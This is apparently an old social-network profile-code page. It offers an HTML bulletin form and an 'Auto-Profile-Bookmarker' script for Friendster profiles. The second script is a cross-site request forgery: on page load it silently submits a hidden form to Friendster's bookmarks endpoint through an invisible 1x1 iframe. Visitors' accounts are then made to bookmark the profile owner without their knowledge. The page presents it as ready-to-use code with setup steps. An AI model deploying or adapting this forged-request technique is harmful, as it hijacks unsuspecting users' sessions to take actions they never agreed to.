Post A Bulletin" form in your NON-OVERLAY profile!
Just copy the code below into my
GENERATOR and hit COMPILE! Then, copy the produced codes into your
MEDIA box and hit SAVE! That's all folks!
by Famous
Vkey www.CodeVKEY.info

<form name="bulletin_form" action="bulletin.php" method="post">
<input type="hidden" name="_submitted" value="1"><input type="hidden" name="action" value="post"><table class="formtable">
<tr>
<td class="field"><label for="subjectfield">Subject:
</label></td>
<td class="value"><input id="subjectfield" type="text" name="subject" size="50" maxlength="100" value=""></td>
</tr>
<tr>
<td class="field"><label for="messagefield">Message:
</label></td>
<td class="value"><textarea id="messagefield" name="message" wrap="hard" rows="10" cols="50" onKeyDown="textCounter(document.bulletin_form.message,document.bulletin_form.inputcount,4000);" onKeyUp="textCounter(document.bulletin_form.message,document.bulletin_form.inputcount,4000);"></textarea></td>
</tr>
<tr>
<td class="field"></td>
<td class="value">Characters remaining: <input readonly type="text" name="inputcount" size="5" maxlength="4" value="" class="text">
</td>
</tr>
</table>
<input type="submit" value="Post" onmouseover="window.status='Post';return true;"> <input type="reset" value="Cancel " onclick="location.href='/bulletinboard.php'">
</form>
<script language="JavaScript">
document.bulletin_form.inputcount.value = (4000 - document.bulletin_form.message.value.length);
</script>
Auto-Profile-Bookmarker [APB] (for BOTH IE AND FIREFOX!)
Well, here comes another AUTO code!
This code works for both
OVERLAID and
NON-OVERLAID profile!
Name : Auto-Profile-Bookmarker [APB]
Description : When you add this code into your profile, those visitors who visit your profile would be auto-added into your
People who have bookmarked you list and into their
People you have bookmarked list as well. If the same person re-visits your profile again, nothing would happen!
Instructions :
1) Check the following code :
<script type="text/javascript">
window.onload = function () {document.addbookmark_form.submit();}
</script>
<form name="addbookmark_form" action="http://www.friendster.com/bookmarks.php" method="post" target="bookmark">
<input type="hidden" name="_submitted" value="1"><input type="hidden" name="action" value="add"><input type="hidden" name="uid" value="USERID"><input type="hidden" name="hidden" value="n">
</form>
<iframe name="bookmark" width=1 height=1 scrolling=no></iframe>
2) Change the
USERID variable to your Friendster User ID ( e.g. 11165983 )
3) Copy the code and paste it into this
GENERATOR
4) Copy the produced code into your MEDIA / HTML box and enjoy!!
Please report any bugs in this topic! I can't assure you that the code would work PERFECTLY!!..
Thank you!